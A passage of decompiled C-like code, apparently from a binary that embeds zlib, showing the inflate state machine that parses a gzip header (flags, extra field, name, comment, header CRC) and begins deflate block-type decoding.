                                                                                                                                                  												__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                  												if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                  													_v24 = __dl;
                                                                                                                                                  													__eax =  &_v24;
                                                                                                                                                  													__eflags = __edx;
                                                                                                                                                  													_v23 = __dl;
                                                                                                                                                  													 *(__ebx + 0x18) = E000D30C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                                                                  												}
                                                                                                                                                  												__ecx = _v8;
                                                                                                                                                  												__eax = 0;
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  												__edx = 0;
                                                                                                                                                  												 *__ebx = 2;
                                                                                                                                                  												_v16 = 0;
                                                                                                                                                  												__edi = 0;
                                                                                                                                                  												goto L47;
                                                                                                                                                  											}
                                                                                                                                                  											 *(__esi + 0x18) = "unknown header flags set";
                                                                                                                                                  											goto L39;
                                                                                                                                                  										}
                                                                                                                                                  										 *(__esi + 0x18) = "unknown compression method";
                                                                                                                                                  										goto L39;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										__eflags = __edi - 0x10;
                                                                                                                                                  										if(__edi < 0x10) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L37;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 2:
                                                                                                                                                  									L47:
                                                                                                                                                  									__eflags = __edi - 0x20;
                                                                                                                                                  									if(__edi >= 0x20) {
                                                                                                                                                  										L51:
                                                                                                                                                  										__eax =  *(__ebx + 0x20);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *(__eax + 4) = __edx;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                  										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                  											__eax = __edx;
                                                                                                                                                  											_v24 = __dl;
                                                                                                                                                  											__eax = __edx >> 8;
                                                                                                                                                  											_v23 = __al;
                                                                                                                                                  											__edx = __edx >> 0x10;
                                                                                                                                                  											_v22 = __al;
                                                                                                                                                  											__eax =  &_v24;
                                                                                                                                                  											__eflags = __edx;
                                                                                                                                                  											_v21 = __dl;
                                                                                                                                                  											 *(__ebx + 0x18) = E000D30C1( *(__ebx + 0x18),  &_v24, 4);
                                                                                                                                                  										}
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										 *__ebx = 3;
                                                                                                                                                  										_v16 = 0;
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										goto L56;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										__eflags = __edi - 0x20;
                                                                                                                                                  										if(__edi < 0x20) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L51;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 3:
                                                                                                                                                  									L56:
                                                                                                                                                  									_push(0x10);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									__eflags = __edi - __eax;
                                                                                                                                                  									if(__edi >= __eax) {
                                                                                                                                                  										L60:
                                                                                                                                                  										__ecx =  *(__ebx + 0x20);
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx != 0) {
                                                                                                                                                  											__eax = __dl & 0x000000ff;
                                                                                                                                                  											 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                                                                  											__ecx = __edx;
                                                                                                                                                  											__eax =  *(__ebx + 0x20);
                                                                                                                                                  											__ecx = __edx >> 8;
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  											 *( *(__ebx + 0x20) + 0xc) = __ecx;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                  										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                  											_v24 = __dl;
                                                                                                                                                  											__eax =  &_v24;
                                                                                                                                                  											__eflags = __edx;
                                                                                                                                                  											_v23 = __dl;
                                                                                                                                                  											 *(__ebx + 0x18) = E000D30C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                                                                  										}
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										 *__ebx = 4;
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										_v16 = 0;
                                                                                                                                                  										_v20 = 0;
                                                                                                                                                  										goto L65;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										__eflags = __edi - 0x10;
                                                                                                                                                  										if(__edi < 0x10) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L60;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 4:
                                                                                                                                                  									L65:
                                                                                                                                                  									__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                                                                  									if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                                                                  										__eax =  *(__ebx + 0x20);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											_t157 = __eax + 0x10;
                                                                                                                                                  											 *_t157 =  *(__eax + 0x10) & 0x00000000;
                                                                                                                                                  											__eflags =  *_t157;
                                                                                                                                                  										}
                                                                                                                                                  										L77:
                                                                                                                                                  										 *__ebx = 5;
                                                                                                                                                  										goto L78;
                                                                                                                                                  									}
                                                                                                                                                  									_push(0x10);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									__eflags = __edi - __eax;
                                                                                                                                                  									if(__edi >= __eax) {
                                                                                                                                                  										L70:
                                                                                                                                                  										__eax =  *(__ebx + 0x20);
                                                                                                                                                  										 *(__ebx + 0x40) = __edx;
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *(__eax + 0x14) = __edx;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                  										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                  											_v24 = __dl;
                                                                                                                                                  											__eax =  &_v24;
                                                                                                                                                  											__eflags = __edx;
                                                                                                                                                  											_v23 = __dl;
                                                                                                                                                  											 *(__ebx + 0x18) = E000D30C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                                                                  										}
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										_v16 = 0;
                                                                                                                                                  										_v20 = 0;
                                                                                                                                                  										goto L77;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										__eflags = __edi - 0x10;
                                                                                                                                                  										if(__edi < 0x10) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L70;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 5:
                                                                                                                                                  									L78:
                                                                                                                                                  									__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                                                                  									if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										L92:
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										 *(__ebx + 0x40) = __edx;
                                                                                                                                                  										 *__ebx = 6;
                                                                                                                                                  										goto L94;
                                                                                                                                                  									}
                                                                                                                                                  									__ecx =  *(__ebx + 0x40);
                                                                                                                                                  									__edx = _v8;
                                                                                                                                                  									__eflags = __ecx - __edx;
                                                                                                                                                  									__ecx =  >  ? __edx : __ecx;
                                                                                                                                                  									_v52 = __ecx;
                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                  									if(__ecx != 0) {
                                                                                                                                                  										__edx =  *(__ebx + 0x20);
                                                                                                                                                  										__eflags = __edx;
                                                                                                                                                  										if(__edx != 0) {
                                                                                                                                                  											__eax =  *(__edx + 0x10);
                                                                                                                                                  											_v48 = __eax;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                  												__eax =  *(__edx + 0x14);
                                                                                                                                                  												__eax =  *(__edx + 0x14) -  *(__ebx + 0x40);
                                                                                                                                                  												__edx =  *(__edx + 0x18);
                                                                                                                                                  												_v56 = __eax;
                                                                                                                                                  												__eflags = __eax - __edx;
                                                                                                                                                  												__eax = _v56;
                                                                                                                                                  												if(__eflags <= 0) {
                                                                                                                                                  													__edx = __ecx;
                                                                                                                                                  												} else {
                                                                                                                                                  													__edx = __edx - __eax;
                                                                                                                                                  												}
                                                                                                                                                  												__ecx = _v12;
                                                                                                                                                  												__eax = __eax + _v48;
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												__eax = memcpy(__eax, _v12, __edx);
                                                                                                                                                  												__ecx = _v52;
                                                                                                                                                  												__esp = __esp + 0xc;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                  										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                  											 *(__ebx + 0x18) = E000D30C1( *(__ebx + 0x18), _v12, __ecx);
                                                                                                                                                  										}
                                                                                                                                                  										__eax = _v52;
                                                                                                                                                  										_v8 = _v8 - __eax;
                                                                                                                                                  										_v12 = _v12 + __eax;
                                                                                                                                                  										_t187 = __ebx + 0x40;
                                                                                                                                                  										 *_t187 =  *(__ebx + 0x40) - __eax;
                                                                                                                                                  										__eflags =  *_t187;
                                                                                                                                                  									}
                                                                                                                                                  									__edx = 0;
                                                                                                                                                  									__eflags =  *(__ebx + 0x40);
                                                                                                                                                  									if( *(__ebx + 0x40) != 0) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									} else {
                                                                                                                                                  										goto L92;
                                                                                                                                                  									}
                                                                                                                                                  								case 6:
                                                                                                                                                  									__edx = 0;
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									L94:
                                                                                                                                                  									__eflags =  *(__ebx + 0x10) & 0x00000800;
                                                                                                                                                  									if(( *(__ebx + 0x10) & 0x00000800) == 0) {
                                                                                                                                                  										__eax =  *(__ebx + 0x20);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *(__eax + 0x1c) = __edx;
                                                                                                                                                  										}
                                                                                                                                                  										L110:
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										 *__ebx = 7;
                                                                                                                                                  										 *(__ebx + 0x40) = 0;
                                                                                                                                                  										goto L112;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                  									if(__ecx == 0) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__esi = _v8;
                                                                                                                                                  									__eax = __edx;
                                                                                                                                                  									__edx = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                  										__eax = __eax + 1;
                                                                                                                                                  										_v48 = __ecx;
                                                                                                                                                  										__ecx =  *(__ebx + 0x20);
                                                                                                                                                  										_v56 = __eax;
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx != 0) {
                                                                                                                                                  											__edx =  *(__ecx + 0x1c);
                                                                                                                                                  											__eflags =  *(__ecx + 0x1c);
                                                                                                                                                  											if( *(__ecx + 0x1c) != 0) {
                                                                                                                                                  												__edx =  *(__ebx + 0x40);
                                                                                                                                                  												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                  												if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                                                  													__ecx =  *(__ecx + 0x1c);
                                                                                                                                                  													__eax = _v48;
                                                                                                                                                  													 *(__ecx + __edx) = __al;
                                                                                                                                                  													_t207 = __ebx + 0x40;
                                                                                                                                                  													 *_t207 =  *(__ebx + 0x40) + 1;
                                                                                                                                                  													__eflags =  *_t207;
                                                                                                                                                  													__eax = _v56;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											__edx = _v12;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _v48;
                                                                                                                                                  										if(_v48 == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __eax - __esi;
                                                                                                                                                  										if(__eax < __esi) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                  									__esi = _a4;
                                                                                                                                                  									if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                  										 *(__ebx + 0x18) = __eax;
                                                                                                                                                  										__eax = _v56;
                                                                                                                                                  									}
                                                                                                                                                  									__ecx = _v8;
                                                                                                                                                  									_v12 = _v12 + __eax;
                                                                                                                                                  									__ecx = _v8 - __eax;
                                                                                                                                                  									__eflags = _v48;
                                                                                                                                                  									_v8 = __ecx;
                                                                                                                                                  									if(_v48 != 0) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									} else {
                                                                                                                                                  										goto L110;
                                                                                                                                                  									}
                                                                                                                                                  								case 7:
                                                                                                                                                  									__edx = 0;
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									L112:
                                                                                                                                                  									__eflags =  *(__ebx + 0x10) & 0x00001000;
                                                                                                                                                  									if(( *(__ebx + 0x10) & 0x00001000) == 0) {
                                                                                                                                                  										__eax =  *(__ebx + 0x20);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *(__eax + 0x24) = __edx;
                                                                                                                                                  										}
                                                                                                                                                  										L128:
                                                                                                                                                  										__edx = _v16;
                                                                                                                                                  										 *__ebx = 8;
                                                                                                                                                  										goto L129;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                  									if(__ecx == 0) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__esi = _v8;
                                                                                                                                                  									__eax = __edx;
                                                                                                                                                  									__edx = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                  										__eax = __eax + 1;
                                                                                                                                                  										_v48 = __ecx;
                                                                                                                                                  										__ecx =  *(__ebx + 0x20);
                                                                                                                                                  										_v56 = __eax;
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx != 0) {
                                                                                                                                                  											__edx =  *(__ecx + 0x24);
                                                                                                                                                  											__eflags =  *(__ecx + 0x24);
                                                                                                                                                  											if( *(__ecx + 0x24) != 0) {
                                                                                                                                                  												__edx =  *(__ebx + 0x40);
                                                                                                                                                  												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                                                                  												if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                                                                  													__ecx =  *(__ecx + 0x24);
                                                                                                                                                  													__eax = _v48;
                                                                                                                                                  													 *(__ecx + __edx) = __al;
                                                                                                                                                  													_t242 = __ebx + 0x40;
                                                                                                                                                  													 *_t242 =  *(__ebx + 0x40) + 1;
                                                                                                                                                  													__eflags =  *_t242;
                                                                                                                                                  													__eax = _v56;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											__edx = _v12;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _v48;
                                                                                                                                                  										if(_v48 == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __eax - __esi;
                                                                                                                                                  										if(__eax < __esi) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                  									__esi = _a4;
                                                                                                                                                  									if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                  										 *(__ebx + 0x18) = __eax;
                                                                                                                                                  										__eax = _v56;
                                                                                                                                                  									}
                                                                                                                                                  									__ecx = _v8;
                                                                                                                                                  									_v12 = _v12 + __eax;
                                                                                                                                                  									__ecx = _v8 - __eax;
                                                                                                                                                  									__eflags = _v48;
                                                                                                                                                  									_v8 = __ecx;
                                                                                                                                                  									if(_v48 != 0) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									} else {
                                                                                                                                                  										goto L128;
                                                                                                                                                  									}
                                                                                                                                                  								case 8:
                                                                                                                                                  									L129:
                                                                                                                                                  									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                  									if(( *(__ebx + 0x10) & 0x00000200) == 0) {
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										L138:
                                                                                                                                                  										__ecx =  *(__ebx + 0x20);
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx != 0) {
                                                                                                                                                  											 *(__ebx + 0x10) =  *(__ebx + 0x10) >> 9;
                                                                                                                                                  											__eax =  *(__ebx + 0x10) >> 0x00000009 & 0x00000001;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											 *(__ecx + 0x2c) = __eax;
                                                                                                                                                  											__eax =  *(__ebx + 0x20);
                                                                                                                                                  											 *( *(__ebx + 0x20) + 0x30) = 1;
                                                                                                                                                  										}
                                                                                                                                                  										__eax = E000D30C1(__edx, __edx, __edx);
                                                                                                                                                  										 *(__ebx + 0x18) = __eax;
                                                                                                                                                  										 *(__esi + 0x30) = __eax;
                                                                                                                                                  										 *__ebx = 0xb;
                                                                                                                                                  										goto L141;
                                                                                                                                                  									}
                                                                                                                                                  									_push(0x10);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									__eflags = __edi - __eax;
                                                                                                                                                  									if(__edi >= __eax) {
                                                                                                                                                  										L134:
                                                                                                                                                  										__eax =  *(__ebx + 0x18) & 0x0000ffff;
                                                                                                                                                  										__eflags = __edx - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                                                                                                  										if(__edx == ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                                                                                                  											__edx = 0;
                                                                                                                                                  											__edi = 0;
                                                                                                                                                  											_v16 = 0;
                                                                                                                                                  											_v20 = 0;
                                                                                                                                                  											goto L138;
                                                                                                                                                  										}
                                                                                                                                                  										 *(__esi + 0x18) = "header crc mismatch";
                                                                                                                                                  										goto L25;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										__eflags = __edi - 0x10;
                                                                                                                                                  										if(__edi < 0x10) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L134;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 9:
                                                                                                                                                  									__eflags = __edi - 0x20;
                                                                                                                                                  									if(__edi >= 0x20) {
                                                                                                                                                  										L151:
                                                                                                                                                  										__ecx = __edx;
                                                                                                                                                  										__edi = 0xff00;
                                                                                                                                                  										__ecx = __edx & 0x0000ff00;
                                                                                                                                                  										__edx = __edx << 0x10;
                                                                                                                                                  										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                                                                  										__edx = __edx >> 8;
                                                                                                                                                  										__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                                                                  										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                                                                  										__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                                                                  										__edx = __edx >> 0x18;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__eax = __eax + __edx;
                                                                                                                                                  										 *(__ebx + 0x18) = __eax;
                                                                                                                                                  										 *(__esi + 0x30) = __eax;
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										 *__ebx = 0xa;
                                                                                                                                                  										_v16 = 0;
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										goto L153;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										__eflags = __edi - 0x20;
                                                                                                                                                  										if(__edi < 0x20) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L151;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 0xa:
                                                                                                                                                  									__eax = 0;
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									L153:
                                                                                                                                                  									__eflags =  *((intOrPtr*)(__ebx + 0xc)) - __eax;
                                                                                                                                                  									if( *((intOrPtr*)(__ebx + 0xc)) == __eax) {
                                                                                                                                                  										__eax = _v32;
                                                                                                                                                  										 *(__esi + 0xc) = _v32;
                                                                                                                                                  										__eax = _v28;
                                                                                                                                                  										 *(__esi + 0x10) = _v28;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										 *__esi = _v12;
                                                                                                                                                  										 *(__esi + 4) = __ecx;
                                                                                                                                                  										 *(__ebx + 0x38) = __edx;
                                                                                                                                                  										 *(__ebx + 0x3c) = __edi;
                                                                                                                                                  										_push(2);
                                                                                                                                                  										goto L145;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = E000D2E91(__eax, __eax, __eax);
                                                                                                                                                  									__edx = _v16;
                                                                                                                                                  									__ecx = _v8;
                                                                                                                                                  									 *(__ebx + 0x18) = __eax;
                                                                                                                                                  									 *(__esi + 0x30) = __eax;
                                                                                                                                                  									 *__ebx = 0xb;
                                                                                                                                                  									goto L155;
                                                                                                                                                  								case 0xb:
                                                                                                                                                  									L155:
                                                                                                                                                  									__eflags = _a8 - 5;
                                                                                                                                                  									if(_a8 == 5) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _a8 - 6;
                                                                                                                                                  									if(_a8 == 6) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									goto L157;
                                                                                                                                                  								case 0xc:
                                                                                                                                                  									L157:
                                                                                                                                                  									__eflags =  *(__ebx + 4);
                                                                                                                                                  									if( *(__ebx + 4) == 0) {
                                                                                                                                                  										__eflags = __edi - 3;
                                                                                                                                                  										if(__edi >= 3) {
                                                                                                                                                  											L163:
                                                                                                                                                  											__eax = __edx;
                                                                                                                                                  											__edx = __edx >> 1;
                                                                                                                                                  											 *(__ebx + 4) = __eax;
                                                                                                                                                  											__edx = __edx & 0x00000003;
                                                                                                                                                  											__eax = __edx & 0x00000003;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												 *__ebx = 0xd;
                                                                                                                                                  												L172:
                                                                                                                                                  												__edx = __edx >> 2;
                                                                                                                                                  												__edi = __edi - 3;
                                                                                                                                                  												L29:
                                                                                                                                                  												_v16 = _t834;
                                                                                                                                                  												_v20 = _t844;
                                                                                                                                                  												goto L142;
                                                                                                                                                  											}
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												__eax = E000D1718(__ebx);
                                                                                                                                                  												 *__ebx = 0x13;
                                                                                                                                                  												__eflags = _a8 - 6;
                                                                                                                                                  												if(_a8 != 6) {
                                                                                                                                                  													goto L172;
                                                                                                                                                  												}
                                                                                                                                                  												__edx = __edx >> 2;
                                                                                                                                                  												__edi = __edi - 3;
                                                                                                                                                  												_v16 = __edx;
                                                                                                                                                  												goto L331;
                                                                                                                                                  											}
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												_push(0x10);
                                                                                                                                                  												_pop(__eax);
                                                                                                                                                  												 *__ebx = __eax;
                                                                                                                                                  											} else {
                                                                                                                                                  												__eax = __eax - 1;
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax == 0) {
                                                                                                                                                  													 *(__esi + 0x18) = "invalid block type";
                                                                                                                                                  													 *__ebx = 0x1d;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											goto L172;
                                                                                                                                                  										}
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										while(1) {
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  											if(__ecx == 0) {
                                                                                                                                                  												goto L331;
                                                                                                                                                  											}
                                                                                                                                                  											__eax =  *__eax & 0x000000ff;
                                                                                                                                                  											_v8 = __ecx;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											__eax = __eax << __cl;
                                                                                                                                                  											__edi = __edi + 8;
                                                                                                                                                  											__ecx = _v8;
                                                                                                                                                  											__edx = __edx + __eax;
                                                                                                                                                  											__eax = _v12;
                                                                                                                                                  											__eax = _v12 + 1;
                                                                                                                                                  											_v16 = __edx;
                                                                                                                                                  											_v12 = __eax;
                                                                                                                                                  											__eflags = __edi - 3;
                                                                                                                                                  											if(__edi < 3) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											goto L163;
                                                                                                                                                  										}
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__ecx = __edi;
                                                                                                                                                  									 *__ebx = 0x1a;
